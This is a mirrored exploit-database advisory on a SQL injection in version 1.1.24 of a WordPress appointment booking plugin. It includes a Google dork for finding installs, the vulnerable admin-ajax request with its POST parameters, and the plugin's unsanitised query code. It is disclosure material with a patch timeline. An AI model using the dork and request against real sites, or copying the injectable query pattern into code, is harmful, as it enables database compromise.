WordPress Plugin Booking Calendar Contact Form 1.1.24 – addslashes SQL Injection

• Exploit Database
• 12 阅读

• 作者： i0akiN SEC-LABORATORY
  日期： 2016-01-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39342/

• # Exploit Title: WordPress appointment-booking-calendar <=1.1.24 - SQL injection through ´addslashes´ (wordpress ´wp_magic_quotes´ function)
  # Date: 2016-01-28
  # Google Dork: Index of /wordpress/wp-content/plugins/appointment-booking-calendar/
  # Exploit Author: Joaquin Ramirez Martinez [now i0 security-lab]
  # Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
  # Vendor: CodePeople.net
  # Vebdor URI: http://codepeople.net
  # Version: 1.1.24
  # OWASP Top10: A1-Injection
  # Tested on: windows 10 + firefox + sqlmap 1.0.
  
  ===================
  PRODUCT DESCRIPTION
  ===================
  "Appointment Booking Calendar is a plugin for **accepting online bookings** from a set of **available time-slots in 
  a calendar**. The booking form is linked to a **PayPal** payment process.
  
  You can use it to accept bookings for medical consultation, classrooms, events, transportation and other activities
  where a specific time from a defined set must be selected, allowing you to define the maximum number of bookings 
  that can be accepted for each time-slot."
  
  (copy of readme file)
  
  
  ======================
  EXPLOITATION TECHNIQUE
  ======================
  remote
  
  ==============
  SEVERITY LEVEL
  ==============
  
  critical
  
  ================================
  TECHNICAL DETAILS && DESCRIPTION
  ================================
  
  A SQL injection flaw was discovered within the latest WordPress appointment-booking-calendar plugin version 1.1.24.
  
  The flaw were found in the function that is executed when the action ´cpabc_appointments_calendar_update´ is called.
  The action is added with ´init´ tag, so it function is called every time when parameter 
  ´action=cpabc_appointments_calendar_update´ appear in the query string (GET request) or POST request.
  
  Exploiting succesful this vulnerability we need a vulnerable wordpress site with especial character set for to bypass
  the ´addslashes´ function (called automatically and applied in all variables $_POST and $_GET by wordpress ´wp_magic_quotes´
  function) and we need own a calendar too (could be owned by privilege escalation) or be a user with ´edit_pages´ permission (admin|editor).
  
  The security risk of SQL injection vulnerabilities are extremely because by using this type of flaw, an attacker
  can compromise the entire web server.
  
  ================
  PROOF OF CONCEPT
  ================
  
  An unauthenticated attacker can make a request like...
  
  http://<wp-host>/<wp-path>/wp-admin/admin-ajax.php?action=cpabc_appointments_check_posted_data
  &cpabc_calendar_update=1&id=<owned calendar id>
  
  Example:
  
  	Exploiting simple SQL injection:
  
  	http://localhost/wordpress/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update
  	&cpabc_calendar_update=1&id=1
  	
  	Post data:
  	specialDates=&workingDates&restrictedDates&timeWorkingDates0&timeWorkingDates1&timeWorkingDates2
  	&timeWorkingDates3&timeWorkingDates4&timeWorkingDates5&	imeWorkingDates6
  
  All post variables are vulnerable to SQLi with ´addslashes´ bypass.
  
  ===============
  VULNERABLE CODE
  ===============
  
  located in ´cpabc_appointments.php´
  
  function cpabc_appointments_calendar_update() {
  global $wpdb, $user_ID;
  
  	if ( ! isset( $_GET['cpabc_calendar_update'] ) || $_GET['cpabc_calendar_update'] != '1' )
  		return;
  
  $calid = intval(str_replace(CPABC_TDEAPP_CAL_PREFIX, "",$_GET["id"]));
  if ( ! current_user_can('edit_pages') && !cpabc_appointments_user_access_to($calid) )
  return;
  echo "sa";
  cpabc_appointments_add_field_verify(CPABC_TDEAPP_CONFIG, 'specialDates');
  
  //@ob_clean();
  header("Cache-Control: no-store, no-cache, must-revalidate");
  header("Pragma: no-cache");
  if ( $user_ID )
  $wpdb->query("update".CPABC_TDEAPP_CONFIG." set specialDates='".$_POST["specialDates"]."',".CPABC_TDEAPP_CONFIG_WORKINGDATES."='"
  		.$_POST["workingDates"]."',".CPABC_TDEAPP_CONFIG_RESTRICTEDDATES."='".$_POST["restrictedDates"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES0.
  		"='".$_POST["timeWorkingDates0"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES1."='".$_POST["timeWorkingDates1"]."',".
  		CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES2."='".$_POST["timeWorkingDates2"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES3."='"
  		.$_POST["timeWorkingDates3"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES4."='".$_POST["timeWorkingDates4"]."',"
  		.CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES5."='".$_POST["timeWorkingDates5"]."',".CPABC_TDEAPP_CONFIG_TIMEWORKINGDATES6
  		."='".$_POST["timeWorkingDates6"]."'where ".CPABC_TDEAPP_CONFIG_ID."=".$calid);
  
  exit();
  }
  
  
  ===========
  
  
  Note:
  cpabc_appointments_calendar_update2() function is vulnerable too by the same exploit explaned here.
  
  
  ==========
   CREDITS
  ==========
  
  Vulnerability discovered by:
  	Joaquin Ramirez Martinez [i0 security-lab]
  	strparser[at]gmail[dot]com
  	https://www.facebook.com/I0-security-lab-524954460988147/
  	https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q
  
  
  ========
  TIMELINE
  ========
  
  2016-01-08 vulnerability discovered
  2016-01-24 reported to vendor
  2016-01-27 released plugin version 1.1.25
  2016-01-28 public disclousure